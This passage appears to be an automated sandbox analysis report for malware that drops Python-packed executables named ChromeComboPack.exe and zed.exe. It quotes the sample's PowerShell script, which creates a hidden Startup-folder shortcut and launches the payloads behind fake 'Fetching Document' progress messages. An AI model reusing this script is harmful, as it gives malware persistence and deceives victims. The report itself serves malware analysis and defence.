Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\zlib1.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\charset_normalizer\md__mypyc.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\python312.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\tcl86t.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\_cffi_backend.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\pywin32_system32\pywintypes312.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\charset_normalizer\md.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\charset_normalizer\md.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\select.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\charset_normalizer\md__mypyc.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\select.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Util\_cpuid_c.pyd	Jump to dropped file

Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\wheel-0.43.0.dist-info\LICENSE.txt

Boot Survival

Powershell creates an autostart link

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: .lnk" $startupFolder = [System.IO.Path]::Combine($env:APPDATA, "Microsoft\Windows\Start Menu\Programs\Startup")$shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName)$shell = New-Object -ComObject WScript.Shell$shortcut = $shell.CreateShortcut($shortcutPath)$shortcut.TargetPath = "powershell.exe"$shortcut.Arguments = "-WindowStyle Hidden -File `"$ps1Path`""$shortcut.WindowStyle = 7$shortcut.Description = "Runs taskboy.ps1 on system startup"$shortcut.Save()# Execute processes if presentif (Test-Path $payloadFolderPath) { Set-Location -Path $payloadFolderPath Write-Host "Fetching Document -- 40% --" $zedExePath = Join-Path $payloadFolderPath "zed.exe" if (Test-Path $zedExePath) { $processRunning = Get-Process -Name "zed" -ErrorAction SilentlyContinue if ($null -eq $processRunning) { Start-Process -FilePath $zedExePath -WorkingDirectory $payloadFolderPath Write-Host "Fetching Document -- 45% --" Start-Sleep -Seconds 120 } else { Write-Host "Error at -- 45% --" } $chromeComboPackPath = Join-Path $payloadFolderPath "ChromeComboPack.exe" if (Test-Path $chromeComboPackPath) { Start-Process -FilePath $chromeComboPackPath -WorkingDirectory $payloadFolderPath Write-Host "Fetching Document -- 65% --" } else { Write-Host "Error at -- 65% --" } } else { Write-Host "Error at -- 75.5% --" }} else { Write-Host "Error at -- 85.5% --"}Read-Host "Fetching Document -- 100% --"@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell user required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'S

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunTaskboyOnStartup.lnk

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunTaskboyOnStartup.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe

Code function: 6_2_00007FF7E53076C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

6_2_00007FF7E53076C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
